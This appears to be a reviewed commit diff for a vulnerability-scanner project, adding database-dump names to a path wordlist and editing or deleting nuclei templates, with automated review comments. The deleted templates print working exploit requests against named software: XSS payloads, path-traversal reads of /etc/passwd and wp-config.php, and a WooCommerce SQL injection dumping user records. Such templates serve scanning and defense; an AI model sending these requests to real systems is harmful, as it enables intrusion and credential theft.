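--- a/brute/dicts/filedic.txt
+++ b/brute/dicts/filedic.txt
@@ -1596,6 +1596,7 @@
 /access-log.1
 /access.1
 /access.log
+/accounts.sql
 /activeMQ/
 /activemq
 /activity
@@ -1747,6 +1748,7 @@
 /axis2/
 /axis2/axis2-admin/login
 /b.php
+/back.sql
 /back.tar.bz2
 /backup
 /backup.7z
@@ -1759,6 +1761,7 @@
 /backup.tar.gz
 /backup.tgz
 /backup.zip
+/backups.sql
 /bbs
 /bbs.tar
 /bbs.tar.gz
@@ -1792,6 +1795,7 @@
 /checkLogin.do
 /classes.war
 /cleanup.log
+/clients.sql
 /cloudstore/config/mysql.xml
 /cm.php
 /code.tar.gz
@@ -1851,6 +1855,7 @@
 /cri
 /css.asp
 /customers.log
+/customers.sgl
 /dama.asp
 /dama.aspx
 /dama.jsp
@@ -1877,8 +1882,10 @@
 /database.log
 /database.properties
 /database.rar
+/database.sgl
 /database.sql
 /database.sql.gz
+/database.sqlite
 /database.tar.bz2
 /database.tar.gz
 /database.tgz
@@ -1906,7 +1913,10 @@
 /db.yaml
 /db.yml
 /db.zip
+/db_backup.sql
 /dbaccess.log
+/dbase.sql
+/dbdump.sql
 /dbeaver-data-sources.xml
 /debug
 /debug.log
@@ -2156,6 +2166,7 @@
 /monitoring
 /mw-config/
 /myadmin/login.php
+/mysql.sql
 /nacos/
 /nagios
 /nginx.conf
@@ -2324,6 +2335,7 @@
 /sql.html
 /sql.log
 /sql.rar
+/sql.sql
 /sql.tar.bz2
 /sql.tar.gz
 /sql.tgz
@@ -2367,6 +2379,7 @@
 /temp.7z
 /temp.gz
 /temp.rar
+/temp.sql
 /temp.tar.bz2
 /temp.tar.gz
 /temp.tgz
@@ -2473,6 +2486,7 @@
 /uploads/dump.sql
 /user-login.html
 /users.log
+/users.sql
 /users/sign_in
 /v1/health/service/consul
 /v1/swagger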
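Review bot: The added entries `/customers.sgl` (new line 1858) and `/database.sgl` (new line 1885) look like typos of `.sql`: every other addition in this change uses the `.sql` suffix, and `/database.sql` already sits on the very next line (new line 1886), so the `.sgl` variant adds a request for a name that nothing else in the list suggests exists. Since the wordlist is consumed verbatim, each stray entry is one extra request per target. Either drop the two `.sgl` lines or, where no `.sql` twin exists (the `/customers.` case), correct the suffix to `.sql`. The rest of the additions are consistent with the existing `/uploads/dump.sql` style.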
    config/nuclei-templates/cves/2022/CVE-2022-32159.yaml
    1  -id: CVE-2022-32159
    2  - 
    3  -info:
    4  - name: Open edX - Cross-site Scripting
    5  - author: arafatansari
    6  - severity: medium
    7  - description: |
    8  - Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
    9  - reference:
    10  - - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2022-32159
    12  - - https://www.mend.io/vulnerability-database/CVE-2022-32159
    13  - - https://github.com/internetarchive/infogami/pull/195/commits/ccc2141c5fb093870c9e2742c01336ecca8cd12e
    14  - classification:
    15  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    16  - cvss-score: 5.4
    17  - cve-id: CVE-2022-32159
    18  - cwe-id: CWE-79
    19  - metadata:
    20  - comment: Hover the cursor on the redirect link
    21  - shodan-query: http.html:"Open edX"
    22  - verified: "true"
    23  - tags: cve,cve2022,openedx,xss
    24  - 
    25  -requests:
    26  - - method: GET
    27  - path:
    28  - - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
    29  - 
    30  - matchers-condition: and
    31  - matchers:
    32  - - type: word
    33  - part: body
    34  - words:
    35  - - '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
    36  - 
    37  - - type: word
    38  - part: header
    39  - words:
    40  - - text/html
    41  - 
    42  - - type: status
    43  - status:
    44  - - 200
    45  - 
    config/nuclei-templates/cves/2022/CVE-2022-38463.yaml
    skipped 9 lines
    10 10   - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
    11 11   - https://nvd.nist.gov/vuln/detail/CVE-2022-38463
    12 12   classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     14 + cvss-score: 6.1
    13 15   cve-id: CVE-2022-38463
     16 + cwe-id: CWE-79
    14 17   metadata:
    15  - verified: true
    16 18   shodan-query: http.title:"ServiceNow"
     19 + verified: "true"
    17 20   tags: cve,cve2022,servicenow,xss
    18  -
    19 21  requests:
    20 22   - method: GET
    21 23   path:
    skipped 18 lines
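Review bot: `verified: "true"` on new line 19 turns the value that was a boolean at old line 15 into the string "true", and in this same commit `config/nuclei-templates/exposures/configs/magento-config-disclosure.yaml` keeps `verified: true` unquoted at its line 12, so the two templates now disagree on the type of the same metadata field. If the quoted form is the convention being adopted (presumably to satisfy the template validator), the remaining unquoted occurrences should be converted in the same change; otherwise this one should stay `verified: true`. Moving the key below `shodan-query` is cosmetic and fine. The `info:` mapping this hunk edits starts above line 10, outside the hunk.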
    config/nuclei-templates/exposed-panels/apache/tomcat-pathnormalization.yaml
    1  -id: tomcat-manager-pathnormalization
    2  - 
    3  -info:
    4  - name: Tomcat Manager Path Normalization
    5  - author: organiccrap
    6  - severity: info
    7  - description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target
    8  - operating system.
    9  - reference:
    10  - - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization
    11  - - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
    12  - classification:
    13  - cwe-id: CWE-200
    14  - tags: panel,tomcat,apache
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/..;/manager/html'
    20  - - '{{BaseURL}}/..;/host-manager/html'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: word
    25  - words:
    26  - - 'username="tomcat" password="s3cret"'
    27  - - 'manager-gui'
    28  - condition: and
    29  - 
    30  - - type: status
    31  - negative: true
    32  - status:
    33  - - 403
    34  - - 401
    35  - 
    36  -# Enhanced by mp on 2022/03/17
    37  - 
    config/nuclei-templates/exposures/configs/magento-information-disclosure.yaml config/nuclei-templates/exposures/configs/magento-config-disclosure.yaml
    1  -id: magento-information-disclosure
     1 +id: magento-config-disclosure
    2 2   
    3 3  info:
    4  - name: Magento - Information Disclosure
    5  - author: ptonewreckin,danigoland
     4 + name: Magento - Config Disclosure
     5 + author: ptonewreckin,danigoland,geeknik
    6 6   severity: high
    7 7   description: |
    8 8   Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
    skipped 1 lines
    10 10   - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
    11 11   metadata:
    12 12   verified: true
     13 + shodan-query: http.component:"Magento"
    13 14   tags: magento,exposure,credential,config
    14 15   
    15 16  requests:
    skipped 35 lines
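Review bot: Changing the template `id` from `magento-information-disclosure` to `magento-config-disclosure` (new line 1) is a breaking change for anything that references the template by id — nuclei include/exclude lists, workflow `template:` entries, or result-filtering config in scan4all — and this diff does not show those references being updated, so that needs checking. The Magento workflow in this same commit switches to `tags: magento`, which does cover this file via the tags on line 14, so the workflow itself is fine. The description on line 8 still promises usernames and passwords while the new name only says config; keeping the two in step (for example keeping `credential` in the name or trimming the description) would avoid confusion in reports.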
    config/nuclei-templates/exposures/configs/magento-config.yaml
    1  -id: magento-config
    2  - 
    3  -info:
    4  - name: Magento Config Disclosure
    5  - author: geeknik
    6  - severity: medium
    7  - metadata:
    8  - shodan-query: http.component:"Magento"
    9  - tags: config,exposure,magento
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/app/etc/local.xml"
    15  - - "{{BaseURL}}/store/app/etc/local.xml"
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: status
    20  - status:
    21  - - 200
    22  - 
    23  - - type: word
    24  - words:
    25  - - "text/xml"
    26  - part: header
    27  - 
    28  - - type: word
    29  - words:
    30  - - "Magento"
    31  - part: body
    config/nuclei-templates/misconfiguration/unauthenticated-influxdb.yaml
    1  -id: unauthenticated-influxdb
    2  - 
    3  -info:
    4  - name: Unauthentication InfluxDB Detection
    5  - author: pussycat0x
    6  - severity: high
    7  - metadata:
    8  - shodan-dork: InfluxDB
    9  - tags: unauth,db,influxdb,misconfig
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
    15  -
    16  - matchers-condition: and
    17  - matchers:
    18  - - type: word
    19  - part: body
    20  - words:
    21  - - '"results":'
    22  - - '"name":"databases"'
    23  - condition: and
    24  -
    25  - - type: status
    26  - status:
    27  - - 200
    config/nuclei-templates/takeovers/wix-takeover.yaml
    skipped 16 lines
    17 17   matchers-condition: and
    18 18   matchers:
    19 19   - type: word
    20  - condition: or
    21 20   words:
    22 21   - 'Error ConnectYourDomain occurred'
    23 22   - 'wixErrorPagesApp'
     23 + condition: and
    24 24   
    25 25   - type: status
    26 26   status:
    skipped 1 lines
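Review bot: Switching the word matcher from `condition: or` (old line 20) to `condition: and` (new line 23) now requires both `Error ConnectYourDomain occurred` and `wixErrorPagesApp` in the same response, so a dangling Wix domain whose error page carries only one of the markers is no longer reported; nothing in the commit records why the sensitivity was reduced. If the motivation is false positives, say so above the matcher, e.g. `# both markers required; a single marker also appears on non-takeover Wix error pages` — adjusted to whatever was actually observed — so the next maintainer does not flip it back. Moving the key below `words:` is purely cosmetic. The matcher list continues past the hunk (the status matcher at lines 25–26 onward).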
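--- a/config/nuclei-templates/tb.sh
+++ /dev/null
@@ -1,3 +0,0 @@
-myrsync ./ $HOME/MyWork/scan4all/config/nuclei-templates
-
-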
    config/nuclei-templates/vulnerabilities/other/concrete-xss.yaml
    1  -id: concrete-xss
    2  - 
    3  -info:
    4  - name: Unauthenticated reflected XSS in preview_as_user function
    5  - author: shifacyclewla,hackergautam
    6  - severity: medium
    7  - description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
    8  - reference:
    9  - - https://hackerone.com/reports/643442
    10  - - https://github.com/concrete5/concrete5/pull/7999
    11  - - https://twitter.com/JacksonHHax/status/1389222207805661187
    12  - tags: concrete,xss,cms
    13  - 
    14  -requests:
    15  - - method: GET
    16  - path:
    17  - - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
    18  - 
    19  - matchers-condition: and
    20  - matchers:
    21  - - type: word
    22  - part: body
    23  - words:
    24  - - '</iframe><svg/onload=alert("{{randstr}}")>'
    25  - 
    26  - - type: word
    27  - part: header
    28  - words:
    29  - - "text/html"
    30  - - "CONCRETE5"
    31  - condition: and
    32  - 
    33  - - type: status
    34  - status:
    35  - - 200
    config/nuclei-templates/vulnerabilities/other/gnuboard-sms-xss.yaml
    1  -id: gnuboard-sms-xss
    2  - 
    3  -info:
    4  - name: Gnuboard CMS - SMS Emoticon XSS
    5  - author: gy741
    6  - severity: medium
    7  - description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
    8  - reference:
    9  - - https://sir.kr/g5_pds/4788?page=5
    10  - - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
    11  - metadata:
    12  - verified: true
    13  - shodan-query: http.html:"Gnuboard"
    14  - tags: xss,gnuboard
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: word
    24  - part: body
    25  - words:
    26  - - '"0nuboard<svg onload=alert(document.domain)>"'
    27  - 
    28  - - type: word
    29  - part: header
    30  - words:
    31  - - "text/html"
    32  - 
    33  - - type: status
    34  - status:
    35  - - 200
    36  - 
    config/nuclei-templates/vulnerabilities/wordpress/accessibility-helper-xss.yaml
    1  -id: accessibility-helper-xss
    2  - 
    3  -info:
    4  - name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDK
    6  - severity: medium
    7  - description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
    10  - tags: xss,wordpress,wp-plugin,wp
    11  - 
    12  -requests:
    13  - - method: GET
    14  - path:
    15  - - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: word
    20  - part: body
    21  - words:
    22  - - "var wah_target_src = '';alert(document.domain);//';"
    23  - 
    24  - - type: word
    25  - part: header
    26  - words:
    27  - - text/html
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
    config/nuclei-templates/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
    1  -id: admin-word-count-column-lfi
    2  - 
    3  -info:
    4  - name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
    5  - author: daffainfo,Splint3r7
    6  - severity: high
    7  - description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
    10  - - https://wordpress.org/plugins/admin-word-count-column/
    11  - remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    14  - cvss-score: 7.5
    15  - cwe-id: CWE-22
    16  - tags: wordpress,wp-plugin,lfi,wp
    17  - 
    18  -requests:
    19  - - method: GET
    20  - path:
    21  - - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
    22  - 
    23  - matchers-condition: and
    24  - matchers:
    25  - - type: regex
    26  - regex:
    27  - - "root:[x*]:0:0"
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
    33  -# Enhanced by mp on 2022/08/01
    34  - 
    config/nuclei-templates/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
    1  -id: cab-fare-calculator-lfi
    2  - 
    3  -info:
    4  - name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion
    5  - author: Hassan Khan Yusufzai - Splint3r7
    6  - severity: high
    7  - description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/50843
    10  - - https://wordpress.org/plugins/cab-fare-calculator
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: regex
    25  - regex:
    26  - - "root:[x*]:0:0"
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
    32  -# Enhanced by mp on 2022/08/01
    33  - 
    config/nuclei-templates/vulnerabilities/wordpress/candidate-application-lfi.yaml
    1  -id: candidate-application-lfi
    2  - 
    3  -info:
    4  - name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    12  - cvss-score: 8.6
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: regex
    24  - regex:
    25  - - "root:[x*]:0:0"
    26  - 
    27  - - type: status
    28  - status:
    29  - - 200
    30  - 
    31  -# Enhanced by mp on 2022/04/21
    32  - 
    config/nuclei-templates/vulnerabilities/wordpress/db-backup-lfi.yaml
    1  -id: db-backup-lfi
    2  - 
    3  -info:
    4  - name: WordPress DB Backup <=4.5 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
    10  - - https://www.exploit-db.com/exploits/35378
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: word
    25  - part: body
    26  - words:
    27  - - "DB_NAME"
    28  - - "DB_PASSWORD"
    29  - condition: and
    30  - 
    31  - - type: status
    32  - status:
    33  - - 200
    34  - 
    35  -# Enhanced by mp on 2022/08/05
    36  - 
    config/nuclei-templates/vulnerabilities/wordpress/feedwordpress-xss.yaml
    1  -id: feedwordpress-xss
    2  - 
    3  -info:
    4  - name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDk
    6  - severity: medium
    7  - description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
    10  - tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - - |
    23  - GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
    24  - Host: {{Hostname}}
    25  - 
    26  - cookie-reuse: true
    27  - matchers-condition: and
    28  - matchers:
    29  - - type: word
    30  - part: body
    31  - words:
    32  - - '"><img src=2 onerror=alert(document.domain)>" method="post">'
    33  - 
    34  - - type: word
    35  - part: header
    36  - words:
    37  - - text/html
    38  - 
    39  - - type: status
    40  - status:
    41  - - 200
    42  - 
    config/nuclei-templates/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
    1  -id: newsletter-manager-open-redirect
    2  - 
    3  -info:
    4  - name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
    5  - author: akincibor
    6  - severity: low
    7  - description: |
    8  - The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
    9  - reference:
    10  - - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
    11  - metadata:
    12  - verified: true
    13  - tags: wp-plugin,redirect,wordpress,wp,unauth
    14  - 
    15  -requests:
    16  - - method: GET
    17  - path:
    18  - - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
    19  - 
    20  - matchers:
    21  - - type: regex
    22  - part: header
    23  - regex:
    24  - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
    25  - 
    config/nuclei-templates/vulnerabilities/wordpress/ninjaform-open-redirect.yaml
    1  -id: ninjaform-open-redirect
    2  - 
    3  -info:
    4  - name: Ninja Forms < 3.4.34 - Administrator Open Redirect
    5  - author: dhiyaneshDk,daffainfo
    6  - severity: low
    7  - description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
    8  - reference:
    9  - - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
    10  - tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - 
    23  - - |
    24  - GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
    25  - Host: {{Hostname}}
    26  - 
    27  - req-condition: true
    28  - cookie-reuse: true
    29  - matchers:
    30  - - type: dsl
    31  - dsl:
    32  - - 'status_code_1 == 302'
    33  - - 'status_code_2 == 302'
    34  - - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
    35  - condition: and
    36  - 
    config/nuclei-templates/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
    1  -id: simple-image-manipulator-lfi
    2  - 
    3  -info:
    4  - name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
    8  - reference:
    9  - - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    12  - cvss-score: 7.5
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: regex
    24  - regex:
    25  - - "root:[x*]:0:0"
    26  - 
    27  - - type: status
    28  - status:
    29  - - 200
    30  - 
    31  -# Enhanced by mp on 2022/07/29
    32  - 
    config/nuclei-templates/vulnerabilities/wordpress/sniplets-lfi.yaml
    1  -id: sniplets-lfi
    2  - 
    3  -info:
    4  - name: WordPress Sniplets 1.1.2 - Local File Inclusion
    5  - author: dhiyaneshDK
    6  - severity: high
    7  - description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/5194
    10  - classification:
    11  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    12  - cvss-score: 7.5
    13  - cwe-id: CWE-22
    14  - tags: wordpress,wp-plugin,lfi,wp
    15  - 
    16  -requests:
    17  - - method: GET
    18  - path:
    19  - - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
    20  - 
    21  - matchers-condition: and
    22  - matchers:
    23  - - type: word
    24  - part: body
    25  - words:
    26  - - "DB_NAME"
    27  - - "DB_PASSWORD"
    28  - condition: and
    29  - 
    30  - - type: status
    31  - status:
    32  - - 200
    33  - 
    34  -# Enhanced by mp on 2022/07/29
    35  - 
    config/nuclei-templates/vulnerabilities/wordpress/sniplets-xss.yaml
    1  -id: sniplets-xss
    2  - 
    3  -info:
    4  - name: Wordpress Plugin Sniplets - Cross-Site Scripting
    5  - author: dhiyaneshDK
    6  - severity: medium
    7  - description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/5194
    10  - tags: xss,wordpress,wp-plugin,wp
    11  - 
    12  -requests:
    13  - - method: GET
    14  - path:
    15  - - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
    16  - 
    17  - matchers-condition: and
    18  - matchers:
    19  - - type: word
    20  - part: body
    21  - words:
    22  - - "</script><script>alert(document.domain)</script>"
    23  - 
    24  - - type: word
    25  - part: header
    26  - words:
    27  - - text/html
    28  - 
    29  - - type: status
    30  - status:
    31  - - 200
    32  - 
    config/nuclei-templates/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
    1  -id: video-synchro-pdf-lfi
    2  - 
    3  -info:
    4  - name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
    5  - author: Hassan Khan Yusufzai - Splint3r7
    6  - severity: high
    7  - description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
    8  - reference:
    9  - - https://www.exploit-db.com/exploits/50844
    10  - - https://wordpress.org/plugins/video-synchro-pdf/
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi,wp
    16  - 
    17  -requests:
    18  - - method: GET
    19  - path:
    20  - - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
    21  - 
    22  - matchers-condition: and
    23  - matchers:
    24  - - type: regex
    25  - regex:
    26  - - "root:[x*]:0:0"
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
    32  -# Enhanced by mp on 2022/07/29
    33  - 
    config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
    1  -id: wordpress-woocommerce-sqli
    2  - 
    3  -info:
    4  - name: Woocommerce Unauthenticated SQL Injection
    5  - author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
    6  - severity: critical
    7  - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
    8  - reference:
    9  - - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
    10  - - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
    11  - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
    12  - classification:
    13  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    14  - cvss-score: 10.0
    15  - cwe-id: CWE-89
    16  - tags: wordpress,woocommerce,sqli,wp-plugin,injection
    17  - 
    18  -requests:
    19  - - method: GET
    20  - path:
    21  - - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
    22  - - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
    23  - 
    24  - matchers-condition: and
    25  - matchers:
    26  - - type: word
    27  - words:
    28  - - 'sqli-test'
    29  - - 'attribute_counts'
    30  - - 'price_range'
    31  - - 'term'
    32  - condition: and
    33  - 
    34  - - type: word
    35  - words:
    36  - - 'application/json'
    37  - part: header
    38  - 
    39  - - type: status
    40  - status:
    41  - - 200
    42  - 
    43  -# Enhanced by mp on 2022/03/21
    44  - 
    config/nuclei-templates/vulnerabilities/wordpress/wp-church-admin-xss.yaml
    1  -id: wp-church-admin-xss
    2  - 
    3  -info:
    4  - name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
    5  - author: daffainfo
    6  - severity: medium
    7  - reference:
    8  - - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
    9  - tags: wordpress,xss,wp-plugin
    10  - 
    11  -requests:
    12  - - method: GET
    13  - path:
    14  - - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
    15  - 
    16  - matchers-condition: and
    17  - matchers:
    18  - - type: word
    19  - words:
    20  - - "</script><script>alert(document.domain)</script>"
    21  - part: body
    22  - 
    23  - - type: word
    24  - part: header
    25  - words:
    26  - - text/html
    27  - 
    28  - - type: status
    29  - status:
    30  - - 200
    31  - 
